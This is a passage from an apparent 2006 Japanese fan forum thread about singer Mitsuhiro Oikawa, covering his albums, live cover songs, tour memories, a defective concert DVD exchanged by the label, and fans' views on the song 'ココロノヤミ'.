この間久しぶりに新宿の新星堂行ったけど、思ったよりCD置いてないんだね。
シングルがパズルから、アルバムが流星から位しかなかった。
ところが関連商品でベルばらのサントラ?CDが置いてあってワロタ
違和感なかったけどw

264 :NO MUSIC NO NAME :2006/07/18(火) 22:03:31 ID:wJvCb6kp
>>263
EMI時代のものは廃盤じゃなかっけ?
移籍後の作品しか基本的には
販売されていないとおもう

265 :NO MUSIC NO NAME:2006/07/19(水) 03:05:40 ID:zPMMRtmf
芸スポのミッチースレからたどり着いたんだけど、
今度ミッチーのアルバム借りてみようかな…。

266 :NO MUSIC NO NAME:2006/07/19(水) 09:05:50 ID:Pr0OaS9M
>>265
ぜひ!聴いてみてください。
私も最初は借りてみたんだけど、今や全部持ってますとも…

267 :NO MUSIC NO NAME:2006/07/19(水) 10:40:57 ID:MSa44qz3
>>265
ようこそいらっしゃいました。
まずは最新で出てるベスト「光」「博」あたりから、かな。
それ聴いて気に入れば他も聴いてみてね。

でももしレンタル屋さんにあるようなら、ライブDVDでぜひ。
「ちょっと興味」がグググッと引き込まれますわよw

268 :NO MUSIC NO NAME:2006/07/19(水) 12:32:55 ID:DTad/+TQ
そう、引き込まれます。
わたくしは、おっこちて出られなくなりました。
大人になってからポンポンデブーするとは。

269 :NO MUSIC NO NAME:2006/07/20(木) 17:42:13 ID:NOTQJ47X
ミッチーは東京都何区出身なの?

270 :NO MUSIC NO NAME:2006/07/20(木) 17:49:25 ID:KFmz4NLt
練馬区だよ

271 :NO MUSIC NO NAME:2006/07/20(木) 18:00:59 ID:int9XXsz
>>270
GJ!w

272 :NO MUSIC NO NAME:2006/07/20(木) 20:08:34 ID:nY26W1qc
なんで練馬w

>>269
ぐぐれば詳しいプロフィールいくらでもでてくるよ。Wikipedia にも載ってる。

273 :NO MUSIC NO NAME:2006/07/20(木) 22:10:52 ID:mLl5Gn6U
>>272

有り難うございます。ウィキにちゃんと載ってましたね…よく調べず
カキコしてしまいました。

274 :NO MUSIC NO NAME:2006/07/20(木) 23:21:02 ID:NVQSpNWV
たかしくん、または結城さんでミチーに興味もってくれて曲を聞いてくれた人たちにちょっと邦楽スレらしい質問を
(結城に興味でここまでたどり着ける人はいないかw)

曲聞いてみてどうだった?
中にはミチー自身が作詞作曲することも知らなかった人もいると思いますが。
意外だなぁと思った曲やお気に入りになった曲はありましたか?

275 :NO MUSIC NO NAME:2006/07/20(木) 23:27:42 ID:NssvRWOW
俺はうほっではないけど、ミッチーのライブに行ってみたいんだけど。
カップルでくる人たちとかいるの?

276 :NO MUSIC NO NAME:2006/07/20(木) 23:37:11 ID:nY26W1qc
>>275
いるよ。
揃ってノリノリのカップルもいれば、いかにも彼女に連れてこられましたって彼氏もいる。
男子単体でくる人も珍しくない。

277 :NO MUSIC NO NAME:2006/07/20(木) 23:39:48 ID:NssvRWOW
>>276
サンクス!

278 :NO MUSIC NO NAME:2006/07/21(金) 00:03:18 ID:JcGmOO6i
ミッチーさんに昔の山本リンダのカヴァーをおながいします。カッコイイはず。ライヴDVDみますた。

279 :NO MUSIC NO NAME:2006/07/21(金) 00:11:09 ID:yQq6P+Ls
米とかぶるからやだよー

280 :NO MUSIC NO NAME:2006/07/21(金) 00:42:51 ID:LGo0D+6Q
ライブでのカバーはジュリーが一番似合ってた気がする
オスカル衣装でのTOKIOとか6番目のユ・ウ・ウ・ツとかdarlingとか…どれも色っぽい
侍だっけ?片手にピストル〜♪とかいう歌も聴いてみたい

281 :NO MUSIC NO NAME:2006/07/21(金) 07:22:50 ID:ZWtNbntd
ライブでカバーといえばタイトでキュートな〜のアレンジが
あまりにカッコ良すぎでした。

282 :NO MUSIC NO NAME:2006/07/21(金) 11:50:33 ID:aC4mcTDt
ミッチーファンがいっぱいいる!
私の周りには1人もいないのに。。。
感動だぁ!!
嬉しいよぉ〜〜!!

283 :NO MUSIC NO NAME:2006/07/21(金) 14:29:32 ID:QqjbbbY/
>>282
ライブ行ったこと無いのけ?沢山入るから安心しろ

284 :NO MUSIC NO NAME:2006/07/21(金) 22:24:26 ID:GbSpzUMY
宮本さんのカバーしてるのきいてみたかったなー。
初めていった オジサンになってもツアーでDA PUMP歌ってたのも印象に残ってる

285 :NO MUSIC NO NAME:2006/07/21(金) 22:26:49 ID:7vSBgw0Q
「時の過ぎゆくままに」も聴いてみたいぞー
あと西城秀樹のも!!

286 :NO MUSIC NO NAME:2006/07/22(土) 11:48:29 ID:bRtybzyC
西城秀樹はMC中のネタかモノマネの時しか登場しないねw
自分は「チャールストンにはまだ早い」とかも踊りながら歌ってみてほしい、絶対似合う
カヴァー曲なら「世界の終わり」が好きだった
今回やってた「月の裏で会いましょう」もよかったなぁ…元々名曲だし

287 :NO MUSIC NO NAME:2006/07/24(月) 10:05:06 ID:gvNKkA9+
「月の裏…」わたしも好きだ〜

288 :NO MUSIC NO NAME:2006/07/24(月) 19:13:19 ID:Hc1+ElOX
↑禿同

289 :NO MUSIC NO NAME:2006/07/24(月) 23:20:45 ID:R7SEi6RF
カバーの話が続いてたので久々に金歌手聴いたー。
2億4000万と聖書とボクハナクが特にいいね。
君だけにもいいけど他人の歌なのになぜかみちーバージョンは聞き飽き気味なんでw

290 :NO MUSIC NO NAME:2006/07/25(火) 13:25:27 ID:Urz164gM
>>281
宮本浩次君(字あってる?)の曲のカバー自分も昔聞いた!
「暮れない」は確かミスチル、ミッシェルとかも歌ってて凄く格好良かったなぁ。
色んな意味で思い出深いライブだった。
当時ミチーのお友達だった宮本君。今はいずこ…。


291 :NO MUSIC NO NAME:2006/07/25(火) 13:53:18 ID:4ViccDUt
>290
暮れない でやったんだぁ〜。
おヴァカみたいだけど、タイムスリップして聴いて(見て)みてー

292 :NO MUSIC NO NAME:2006/07/26(水) 02:21:18 ID:CQs7h9mb
「暮れない」でミスチルはやってないはず。ミッシェルとサザンだった(確か)。
ミスチルやったのはBLITZで「ニシエヒガシエ」だったと思う。(記憶違いだったらスマソ)

293 :NO MUSIC NO NAME:2006/07/26(水) 19:26:18 ID:P65Ui9a+
>>292
「ニシエヒガシエ」いいなあ!ミスチルで一番好きかも。ミチーの選曲センス好き!

294 :NO MUSIC NO NAME:2006/07/27(木) 03:27:54 ID:Fkrjup1a
映画微妙だった
なんか金の無駄

295 :NO MUSIC NO NAME:2006/07/29(土) 03:23:28 ID:smjv/rw+
久々に歌聴いてびっくり!上手くなってる上に痩せて格好良くなった?
DVD買っちゃいそう。

296 :NO MUSIC NO NAME:2006/07/29(土) 05:30:16 ID:gxNof+eh
買っちゃえ!買っちゃえ!!
ちょうど8月9日に、武道館公演のDVDが発売になりますよ。
ここでダイジェスト映像が見られます。
ttp://www.oikawa-mitsuhiro.com/free/dvd.html

297 :NO MUSIC NO NAME:2006/07/30(日) 05:21:18 ID:wTd8ruDJ
ぶった切りごめん!
友達に借りた『うたかた。』見てたんだけど、流星の途中から丸い斑点みたいなのが並んで映らなくなった…OTL
この話題でてたのってこっちの板だよね?
友達はまだ見てないらしいからどうしようか悩み中…


298 :NO MUSIC NO NAME:2006/07/30(日) 05:48:38 ID:Uwn5tb33
こいつ170〜171cmだよね 174なんて到底ない
いつも7cmの外見から分かるタイプのハイヒールはいてるのは痛々しいw

299 :NO MUSIC NO NAME:2006/07/30(日) 09:55:30 ID:daz5zaqa
白い斑点がディスク表面に、はあったけど
映像に斑点がでて映らなくなったって、初めてじゃなかった?
わたしの勘違い??

300 :NO MUSIC NO NAME:2006/07/30(日) 12:30:55 ID:IlatABhS
>299 いや、確かディスクに斑点だったとおもうー。
ウチのもそうだしw
ウチもそのうち見れなくなっちゃうのか?イヤン

301 :NO MUSIC NO NAME:2006/07/30(日) 15:19:58 ID:aPWKxmAV
以前話が出たとき、ワーナーに送ったら交換してもらった、って言ってたから
症状つたえたら、対応してもらえると思う。>>297
ってか「うたかた」、不良品なのか?ウチのも心配になってきたよ(´・ω・`)

DVDプレイヤーのクリーニングをしてなかった、ていうオチじゃないよね!?

302 :NO MUSIC NO NAME:2006/07/30(日) 15:35:59 ID:oq5waumY
>298
お前が痛々しい。
俺は175あるが、実際に会ってみたら靴の分ミッチーの方が高い。

303 :NO MUSIC NO NAME:2006/07/30(日) 18:05:48 ID:sL6gxfLO
ていうか174センチって誰のこと?
みちーは175センチ。
あと踵高い履いてるのはステージの時のみ。

304 :NO MUSIC NO NAME:2006/07/30(日) 18:54:03 ID:t0qz3DjA
確かデビュー当時のプロフって174センチじゃなかったっけ?
で、大人になってからも背が伸びてた!とかで途中から
175センチになったような気がするんだけど、記憶違いかな・・・

仮に171センチだとしたって、シークレットシューズじゃなく
堂々と「外見から分かるタイプのハイヒールはいてる」なら
潔くていいじゃんw

305 :NO MUSIC NO NAME:2006/07/30(日) 20:31:39 ID:F7zcz1P6
>>304
確かにデブー当時は174って言ってた。

306 :NO MUSIC NO NAME:2006/07/31(月) 00:38:58 ID:t+1QRiab
少女漫画の男子の頭身になるために高い靴履いてるんだよね?
変に身長高く見せようとしてるんなら引くけどそれならいい。

307 :NO MUSIC NO NAME:2006/07/31(月) 00:51:25 ID:hclJSsHa
7センチどころじゃなく、ゆうに10センチ以上はあるような
高い靴をはいてたね。
今はもう高くてもせいぜい5センチくらい?

308 :NO MUSIC NO NAME:2006/07/31(月) 01:23:16 ID:JUFXTx8j
身長175p(バトルモード183p)っていうプロフィールの時が有ったよね

309 :NO MUSIC NO NAME:2006/07/31(月) 12:09:55 ID:3EvNyk8K
あの頃8cmのヒール履いてたって事かw
りえタンにしてもよくそんなヒール履いて踊れるよね


310 :NO MUSIC NO NAME:2006/07/31(月) 22:06:15 ID:hclJSsHa
客席から見上げてた時はもっと高く見えてたけど
8センチだったんだね。戦闘ブーツw

311 :NO MUSIC NO NAME:2006/07/31(月) 23:57:48 ID:3EvNyk8K
ヒールだけじゃなく厚底だったよね
2000年位からピタッとやめちゃったよね
当時はそれが凄く違和感だった
大人への一歩だったんだろうなw

312 :NO MUSIC NO NAME:2006/08/01(火) 01:58:07 ID:MIqi+hy7
その2000年…誰にも〜の頃からそれまでと顔も変わった気がする
大人の男の顔になったよミチー

313 :NO MUSIC NO NAME:2006/08/01(火) 13:45:19 ID:3t4vzVAP
パパパパで踊った時はよくあんなヒールのブーツで踊って脚開いて下について戻す、
ってのが出来たなぁと関心したものだった。

314 :NO MUSIC NO NAME:2006/08/01(火) 13:49:20 ID:XJJERSAq
>312
んだね・・・
誰にも〜からワンマン参加者。モラトリアムのみちーに会いたかったー

315 :NO MUSIC NO NAME:2006/08/01(火) 20:11:11 ID:ZDRhvONf
>>312
悲しいかな、その頃から体つきも変わっちゃったよね…

316 :NO MUSIC NO NAME:2006/08/01(火) 20:21:42 ID:ldm58uBp
鯖スーツ着てたのって何ツアー?
ヒールなくなったのってそこからだと思ってた

317 :NO MUSIC NO NAME:2006/08/02(水) 11:14:53 ID:KQOPRs2F
>>315 ツキノヒカリツアーでは100%じゃないけど
体つき顔つき、かなり昔(デビュー直後)ぽくなってたよ。
ほっそりして。痩せただけでオーラも昔ぽくなっててびっくりした。

318 :NO MUSIC NO NAME:2006/08/02(水) 11:44:31 ID:NE5Bz5da
>>317
自分、ツキノヒカリでは神戸が初参加だったけどちょっとビックリしたもん。
意志のときはそんなに感じなかったから、病気した?と思ったくらい。
撮影と重なってどんどん痩せていったイメージあるけど、
でもTVで吾輩見てたらそんなにすごく痩せた!という感じには見えなかったな。


>>316
鯖スーツ…いつも鯖っぽいといってしまえば鯖っぽいわけなんだがw


319 :NO MUSIC NO NAME:2006/08/02(水) 12:38:05 ID:ckAb1Kiw
鯖は不純?

320 :NO MUSIC NO NAME:2006/08/02(水) 13:45:51 ID:j35pDvpU
鯖スーツって、ヒカリモノのジャケットのやつ?
9年目の本気の時に着てなかったっけ??

321 :NO MUSIC NO NAME:2006/08/02(水) 14:26:17 ID:F8TOJnqC
デビュー直後は56kgじゃなかったっけ?
吾輩で痩せてからは60kg。
オーラは今でも十分あると思うけど。

322 :NO MUSIC NO NAME:2006/08/02(水) 14:50:47 ID:SaxDpLEp
鯖はニヒルマンショウじゃまいか

323 :NO MUSIC NO NAME:2006/08/02(水) 15:05:08 ID:NE5Bz5da
やっぱり、いつも鯖スーツってことじゃんw
アーンド鯖ブラウスw

30代であの身長で60キロジャスト、これをずっと維持できたらかなり素敵。
ミチーがんがれ。

清志郎リスペクトの武道館ってニヒルマン武道館のちょっと前だっけ?
このリスペクトと誰にも…を見比べると、
この半年で何があったか?というくらい顔も体型も変わったよね。
この間に「おやじぃ」が入ってくるんだっけ?あぁもう記憶が…

324 :NO MUSIC NO NAME:2006/08/02(水) 18:58:22 ID:JZI67C9z
鯖スーツ書いた者だけどニヒルマンショー?たしかそんなツアータイトルだった気がする
かなり良席で見てたのにステージ内容全く記憶にないやw
映像に残ってないと忘れるものね
愛哲(あの頃は恋哲?)登場で着てたような…そして白い椅子に座ってたような…
サンクツアリのパンフに写真が載ってたような気がする

325 :NO MUSIC NO NAME:2006/08/03(木) 01:29:57 ID:D2beRSst
正確には「ニヒルなあんちくしょう」だったかと。
ツアーパンフ(あれはポスターか…)は、金髪か銀髪のヅラで
バナナを食べていたよね、確か。
恋哲は白いガーデンテーブルみたいなのと白いチェア、
テーブルの上には赤い薔薇があったと記憶してる。

326 :NO MUSIC NO NAME:2006/08/03(木) 17:41:12 ID:OVdBFwuW
そうそう、バナナがえろかった。

327 :NO MUSIC NO NAME:2006/08/03(木) 18:12:55 ID:6XI3gI9a
ニヒルツアーはミチーの発言が荒みまくりだったな

328 :NO MUSIC NO NAME:2006/08/03(木) 18:43:33 ID:FT5W8VP/
ニヒルツアーって誰にもの前?後?
他に映像化されてないツアーってなんだろ


329 :NO MUSIC NO NAME:2006/08/03(木) 19:04:08 ID:D2beRSst
映像化されるようになったのは、比較的最近じゃない?
ひとりのビッグショー以外は。

330 :NO MUSIC NO NAME:2006/08/03(木) 19:59:46 ID:9vYiU1Mw
ニヒルは誰にもの1つ前。
比較的小さな規模のツアーだったと記憶してる(でもファイナルは無謀にも武道館2デイズw)

あのパンフポスターのミチーはエロカワイイ
金髪ヅラでパンクな印象だよね。

331 :NO MUSIC NO NAME:2006/08/03(木) 20:54:11 ID:FT5W8VP/
サンクツアリ以降はそれぞれのツアー印象に残ってるんだけど
それ以前がほとんど思い出せないのよね
堕天使以外は
思い出せるのは「お嬢さんを僕にください!」とか
「ミッチロリン学園」とか小芝居部分ばかり
今まで何を見てきたんだオイラは…

332 :NO MUSIC NO NAME:2006/08/03(木) 21:01:52 ID:oAR+xnhx
ニヒル、本数は少なかったけど、会場は大きかったよね〜
名古屋はレインボーホールじゃなかったっけか??

333 :NO MUSIC NO NAME:2006/08/03(木) 21:06:08 ID:D2beRSst
そう、クリスマスイブの夜にレインボーホール。
チャレンジャーだよねw

レインボーホールには確か花道があったよね。


334 :NO MUSIC NO NAME:2006/08/03(木) 21:39:38 ID:+pFhlC1m
聖戦にしてもお嬢さんにしてもビデオは撮ってるとみちーが明言してる
(聖戦はチョロッとDVDになってるけど)
権利は東芝が持ってるのかなぁ。
せっかく映像撮ってるなら、いつか見たいよ。
でも堕天使に関してだけは映像にならなくていいや。
あれはあの当時だからこその空気であって、今になって見るものじゃない気がする。

映像になってないといくら楽しくてもやっぱり細かいところは忘れていっちゃうよね。
最近だと「不純異性交遊」…オープニング好きだったのにな。

335 :NO MUSIC NO NAME:2006/08/03(木) 22:58:30 ID:78eY44Q2
>>334 堕天使の件、いいたいことはとてもよくわかる…! <映像にならなくていい…

でも! でもでもでもでも!!!
あるなら観たいよ… _| ̄|○ノシノシ
どこかの地方局が撮ってるはずなんだよ、ちょびっとOAしてたから当時。石川だったかな。
でも全編まるっとは撮ってないのかなあー

336 :NO MUSIC NO NAME:2006/08/04(金) 00:23:50 ID:soU5YXiC
堕天使撮ってるなら少しでも見たい!

337 :NO MUSIC NO NAME:2006/08/04(金) 00:34:35 ID:61Oknikw
堕天使、「あるなら観たい」にイピョーウ

338 :NO MUSIC NO NAME:2006/08/04(金) 00:56:32 ID:KX00MVBL
堕天使、もう見なくていいにイピョウ。胃が痛くなってやだったなぁ。
>331
お嬢さんを僕にください!とかミッチロリン学園とか思い出すの一緒だーw
私もそんなんしか記憶にないっす。

339 :NO MUSIC NO NAME:2006/08/04(金) 02:32:39 ID:6xzJ6Jox
私は、胃が痛かったのは翼。堕天使はそうでもなかった。
>>338>>334の見なくていいは、意味が違うよ。(絡んでスマソ)

340 :NO MUSIC NO NAME:2006/08/04(金) 04:37:12 ID:soU5YXiC
>>339
おぬしツウよのう
翼ってファイナルのみのやつね
自殺シーンがあったという
ファイナル行ってないからどれだけ違ったのか分からないのよね
全く別物だったって事?
てか雑誌で翼の記事読んでその自殺シーン一歩後ろに引いて落ちていき顔面スレスレに壁があったとかさ
描写が細かくて自分も見たような感覚として記憶と心にに残っちゃってるのよ
堕天使と翼いっしょくたにしてたわごめんなさいね

341 :NO MUSIC NO NAME:2006/08/04(金) 06:02:01 ID:TRpTR888
過去に何度も声が上がってると思うけど、せっかくビデオシーティングした
オジさんツアーのファイナルを、何とか表に出してほしい。
今さらというなら、FC限定でもなんでもいいから。
あれが日の目を見ないのはもったいなさ過ぎる。

342 :NO MUSIC NO NAME:2006/08/04(金) 09:12:37 ID:zC82AEAB
FC限定で予約とって、完全受注生産制で発売出来ないのかな。
オジさんファイナルも不純大宮も、その他の映像も全部見たい!

343 :NO MUSIC NO NAME:2006/08/04(金) 09:18:23 ID:33PxOme3
それいいね。実現したらSDRにまた入る。

344 :NO MUSIC NO NAME:2006/08/04(金) 10:02:01 ID:HNlt44Va
売れる売れないの問題じゃなく、権利関係の問題なのかな。
だったら限りなく無理に近くてショボーン

345 :NO MUSIC NO NAME:2006/08/04(金) 11:58:50 ID:G6r8/kGY
>>341
素敵なIDだな

オジサンのファイナルって名古屋だっけか?
自分見に行けなかったけど、あの頃のミチー苦しそうだったな。
ファイナルも精神的にボロボロだったんじゃなかったっけ。
見に行った友達が大泣きしてた。

346 :NO MUSIC NO NAME:2006/08/04(金) 12:36:23 ID:soU5YXiC
最近の会報でミチー自身「病んでた」って言ってるよね
仙台でブチ切れたのって何ツアーだっけ

347 :NO MUSIC NO NAME:2006/08/04(金) 23:17:10 ID:TRpTR888
仙台ぶち切れは堕天使じゃなかったっけ?

348 :NO MUSIC NO NAME:2006/08/04(金) 23:26:09 ID:TRpTR888
おっと、345タンが褒めてくれたのは私のIDだったのか。
自分で言うのもなんだけど、なんかかっこいいねw

345タンについでに。
そう、オジさんのツアーファイナルは名古屋だよ。
名古屋だけオーラスにモラリティーを歌ってくれたの。
ちょうど、ツキノヒカリの大阪2日目と同じようなシチュエーション
っていえばわかりやすいかな。
オジさんの時はサプライズだったのかどうかはわからないけど、
スタッフさんがミチーの頭上から紙ふぶきを降らせたりもして。
ミチーもトランス状態みたいになっちゃうし、何かがミチーに降臨した
瞬間だったと見ていて感じだよ。
最後にまぶたを切ったのもその時だね。

349 :NO MUSIC NO NAME:2006/08/05(土) 00:01:47 ID:0AGXhACC
やっぱり一度は見ておくべきなのは名古屋のライブなのかしら
名古屋、大阪あたりで伝説がおきるよね
大阪は並があるみたいだけど

350 :NO MUSIC NO NAME:2006/08/05(土) 00:12:53 ID:ffOBpe+f
昔は、名古屋は何となく特別…ってイメージがあったけど、
今は他の会場と変わらないよ。
ただ、MCで今でも「ただいま」って言ってくれるのは
やっぱりうれしいけどね。

351 :NO MUSIC NO NAME:2006/08/05(土) 15:45:29 ID:0AGXhACC
並ってなんだよw
波ですた

352 :NO MUSIC NO NAME:2006/08/06(日) 22:33:07 ID:yiHIKRPs
わざとかとおもた。

353 :NO MUSIC NO NAME:2006/08/07(月) 10:19:02 ID:DPr1+nHt
>>347
なつかしいなぁ・・・
おいらのミチーライブ初参加が仙台の堕天使だったんだよね。
しかも6列目くらいだったかな?
詩の朗読のとこで、タイトル詠んだときに客席から笑いが起きてね。
初めてだったから「あぁ、こういうもんなのかなぁ」って思ってたけど
やっぱりあれでブチ切れてたんだね((((;゚Д゚))))

「あんまり前のほうで男子がノリノリで踊ってたから
怒っちゃったのかな?」って本気で心配してファンレター書いたのも
今ではいい思い出でございます・・・(´・ω・`)


354 :NO MUSIC NO NAME:2006/08/07(月) 14:52:25 ID:SNMpVr+q
かわいいなお前
どうして男子がノリノリだとミチーが怒るのよww

誰にもの札幌でも客席がクスクス笑うから怒ってステージから引っ込んじゃったよな

引っ込んだのって今まで他にある?

355 :NO MUSIC NO NAME:2006/08/14(月) 14:54:42 ID:mMMIIwt/
DVD出たのに人いないね。

356 :NO MUSIC NO NAME:2006/08/14(月) 17:25:44 ID:ufNesLMf
夏休みだからね〜

357 :NO MUSIC NO NAME:2006/08/14(月) 17:54:51 ID:uXu3UYHU
DVDの感想も全部あっちのスレでやってしまってるからね
人がいないわけじゃないと・・・

358 :NO MUSIC NO NAME:2006/08/15(火) 17:11:17 ID:rFR+ulpc
CSで 氷の世界 が再放送するのはガイ出?

9/06(水)23:00〜23:48 #1
9/06(水)23:48〜24:37 #2
9/07(木)23:00〜23:48 #3
9/07(木)23:48〜24:37 #4
9/08(金)23:00〜23:48 #5
9/08(金)23:48〜24:37 #6

9/11(月)23:00〜23:48 #7
9/11(月)23:48〜24:37 #8
9/12(火)23:00〜23:48 #9
9/12(火)23:48〜24:37 #10
9/13(水)23:00〜24:00 #11

フジテレビ721

359 :NO MUSIC NO NAME:2006/08/18(金) 02:09:55 ID:Ne4VB2Mk
すいません、誰か教えてくださーい

大田区の六郷ってとこが実家らしいんですが
実家の焼肉屋って高いですか?
夏休み中に行こうと思っているんですけど

360 :NO MUSIC NO NAME:2006/08/19(土) 11:20:45 ID:X61TTsaN
>>359
あそこは会員制(現会員の紹介がないと入会できない)なので、いきなり行っても無理かと。

361 :NO MUSIC NO NAME:2006/08/20(日) 16:49:19 ID:c0MKBkqq
ああ、焼肉屋ね。私も知らないで行って断られて帰ってきた。


362 :NO MUSIC NO NAME:2006/08/22(火) 09:17:42 ID:gSL0/eSh
今週中に日本舞踏館のDVDが届く予定wktk
初めてDVD買っちゃったYO!

363 :NO MUSIC NO NAME:2006/08/23(水) 01:13:40 ID:rw3VCLRB
会員制だなんて聞いた事もない。
有名チャン達が通ったり泊ったり入りびたって
パパやママとのコネ作り合戦だったと聞いたけど今でもなのかな?

364 :NO MUSIC NO NAME:2006/08/23(水) 08:05:27 ID:qmavz1yn
アフォがひとり・・・・・w

365 :NO MUSIC NO NAME:2006/08/23(水) 09:26:01 ID:rQKSwQ7K
できちゃったものはしょうがない新曲マダー??

366 :NO MUSIC NO NAME:2006/08/23(水) 13:02:04 ID:9mcd5ggy
>>362
前のも見たくなるぞ〜ミチ蟻地獄だぞ〜

367 :NO MUSIC NO NAME:2006/08/23(水) 14:05:08 ID:ZjYfLU6W
>>362数日前の私
>>366今現在の私


368 :NO MUSIC NO NAME:2006/08/23(水) 15:15:36 ID:hybuCgRq
>>301
うたかたの件ですが、ワーナーのホムペから相談するといいよ。
初回限定盤だから、新しいもの作り直して交換してくれた。
現品送ったけど、原因不明だって…

369 :NO MUSIC NO NAME:2006/08/23(水) 22:13:57 ID:7nvJUufH
>>301,368
私もうたかた交換してもらった。送って返ってくるまで1週間位だったよ。
まだの人は早めに交換してもらったほうがいいと思う。
送料は向こうが負担してくれるよ。

私は保存用と観賞用の計2本、しかも限定版だから心配したよ。
その度に作ってくれたんだろうね。
ケースも交換されたけど、ケースとディスクの樹脂の相性とかがあるのかな?
原因は追究されてもワーナーの今後に生かされるだけで
ミチー側には連絡いかないだろうね。
会報でお知らせできればいいのに。

残念なのは、未開封で保存してたのに確認のために開けなければならなかったこと、
しかもあまりキレイじゃないケースに変えられた事...○| ̄|_

370 :NO MUSIC NO NAME:2006/08/24(木) 17:44:04 ID:Qi6xVkjO
悲し過ぎる…

371 :NO MUSIC NO NAME:2006/08/25(金) 11:09:12 ID:zRoEYhhn
301です

↓レーザーディスクの話なんだけど、ネットでうたかたの症状について調べた時見つけた。

レーザーディスク(LD)の発売は、10年以上前のものがほとんどです。
しかもレーザーディスク(LD)の表面は水蒸気を通す非常に錆びやすい素材でできています。
盤面に白い斑点ができる、白く濁るなどの症状は錆びです。
拭いてもきれいになりません。
早めにバックアップをとらないと、映像が見られなくなるのでご注意下さい。

↑これ、問題のうたかたDVDと症状似てませんか?
DVDの寿命も心配だなぁ。
これからの時代、デジタル放送のバックアップどうすりゃいいんだ…

スレ違いだけど参考にしてください。
「上手に保管して、長持ちさせよう! CDやDVDにも寿命がある?!」
ttp://allabout.co.jp/computer/av/closeup/CU20040523A/index.htm

うたかたの場合は、保存の問題じゃない気がするけど…

372 :362:2006/08/25(金) 11:59:58 ID:MVOmtyYX
>>366
>>367
日本舞踏館のDVDが届きました。DVD観ながら口元ゆるみっぱなしwww
36のオサーンに見えないヤバイ他のも買っちゃいそうw蟻地獄にはまったかw


>>371
タイムリーな情報ありがとうです!ミチーの初DVD大切にするんだ〜♪

373 :NO MUSIC NO NAME:2006/08/26(土) 00:01:08 ID:zRoEYhhn
間違えた…
371は、301ではなく368でした〜

374 :NO MUSIC NO NAME:2006/08/26(土) 15:58:41 ID:pa318VG0
ココロノヤミがたまらなく大好きです。

この曲はコアなファンのみなさんの間ではどう評価されとりますか?

教えてください

375 :NO MUSIC NO NAME:2006/08/26(土) 17:13:36 ID:4crKG2m7
>>374
ミチー初心者さんですか?
ココロノヤミはファンの間でも勿論定評ありますよ。
贔屓目なしにしてもいい曲だと思います。
ミチー自身も特別な一曲だと言ってるし。

あとこれから書き込みされるときは是非ともsageでお願いしますね。

376 :NO MUSIC NO NAME:2006/08/26(土) 17:32:15 ID:T6hyMOys
私もココロノヤミたまらなく好き

377 :NO MUSIC NO NAME:2006/08/26(土) 23:48:47 ID:cLcYyNim
私は今年3月からの初心者だけど、
「ココロノヤミ」で一気にミチーにはまりこみました。
仕事の帰り、夕方〜夜に聞くとさらによいです。

378 :NO MUSIC NO NAME:2006/08/27(日) 07:53:49 ID:CyQM/rlr
前の職場で一緒に働いてた人(非ファン)が
「ココロノヤミっていい歌ですね。CD買いましたよ」
って言ってくれた時は凄い嬉しかった。

まさか自分がミチーのCD買うとは思わなかったって笑ってたけど、
やっぱりファンじゃない人が曲を評価してくれて買ってくれるのって
有り難いなぁと思った。
当時凄い嬉しかったからミチーに手紙書いて報告しちゃったよw

379 :NO MUSIC NO NAME:2006/08/27(日) 19:59:51 ID:oDp1P8rJ
ココロノヤミはよい曲だよね特に黎明が好き
生で聞くと何度聞いてもグッとくる
ミチーが心を込めて大事に歌ってるのが伝わってくる

わ〜〜聞きたくなった!うたかたDVD見よう

380 :NO MUSIC NO NAME:2006/08/27(日) 22:36:13 ID:/pWSU5F2
ココロノヤミ私も好きです。でもテレビでは一回も歌ってないんだっけ?
もうちょっとプロモーションしてほしかった。
みんなに聞いてほしいかったから。
邪念オーバードライブはミッチーっぽくてもっと好きです。

381 :NO MUSIC NO NAME:2006/08/27(日) 23:03:01 ID:2b9b+YS8
でもプロモVがキモチワルイんだよねぇ
あれが失敗の原因だな

382 :NO MUSIC NO NAME:2006/08/27(日) 23:08:54 ID:sp8Y0G48
ココロノヤミはほんといい曲だよね
2番がとくにグッとくる
テレビなんかで唄わなくて正解だよ

383 :NO MUSIC NO NAME:2006/08/27(日) 23:18:06 ID:H0vHhJO5
ココロノヤミPV、好きだけどなー。
やっぱり人それぞれなんだね。

384 :NO MUSIC NO NAME:2006/08/27(日) 23:31:00 ID:aJy/DFc1
私もココロノヤミPV好き。あのペインティングミチーに萌え。

385 :NO MUSIC NO NAME:2006/08/28(月) 00:49:57 ID:BGy7rc4S
あの頃って三輪さんに出会った頃じゃなかったかな
三輪さんを意識してる感じがする
好きだけどね!

386 :NO MUSIC NO NAME:2006/08/28(月) 01:21:53 ID:To33b6yM
美輪さんに出会ったのは、もっと前だから。

387 :NO MUSIC NO NAME:2006/08/28(月) 03:19:04 ID:BGy7rc4S
はいはい
ここも変なのが湧いてるな

388 :NO MUSIC NO NAME:2006/08/28(月) 13:40:21 ID:4nZFNH5b
私もPV嫌い。見る気がしない<ココロノヤミ
曲は本当にいいのに。

389 :NO MUSIC NO NAME:2006/08/28(月) 20:56:52 ID:To33b6yM
>>385は、ミチーが美輪さんと初めて会ったのが
毛皮のマリーでだと思ってるのか ( ´,_ゝ`)プッ

390 :NO MUSIC NO NAME:2006/08/28(月) 21:11:57 ID:idEgKA4T
自分もあのPVは苦手。
でも幾つになっても歌える曲だし、ミチーの年代ごとに
PVをつくっていくと、その時々の心の風景が描けておもしろいかもしれない。

391 :NO MUSIC NO NAME:2006/08/28(月) 22:34:12 ID:9CubJRx/
幾つになっても歌える、かー。

「その術」とか好きだけど
もう生であんまり聴く機会ないかなー。

一度定番はずしたライブしてほしいな

392 :NO MUSIC NO NAME:2006/08/28(月) 22:58:01 ID:KG38mDsi
そだなー。
「邪念オーバードライブ」とか「SEXの意味・意味のないSEX」とか。
それから「名器」をまもちゃんのギターで聞きたいなあ。

393 :NO MUSIC NO NAME:2006/08/28(月) 23:03:01 ID:De76tMJN
定番はずすも何も新曲作らないから曲がありませんがな。。。

394 :NO MUSIC NO NAME:2006/08/28(月) 23:12:48 ID:eN/UGW4E
三輪さんと初めて会ったのってトークショーだよね?
あれっていつごろだっけ

395 :NO MUSIC NO NAME:2006/08/28(月) 23:26:48 ID:UpsjSSqS
新曲欲しいよねえ

396 :NO MUSIC NO NAME:2006/08/28(月) 23:33:41 ID:De76tMJN
今年はアルバムも新曲も出さずにツアーなのかな?
だとしたら少し寂しい。
個人的にはデビュー当時の曲が好きなんだけどライブはやっぱ新鮮さが欲しい

397 :NO MUSIC NO NAME:2006/08/29(火) 00:15:21 ID:7tMbTbCs
>394
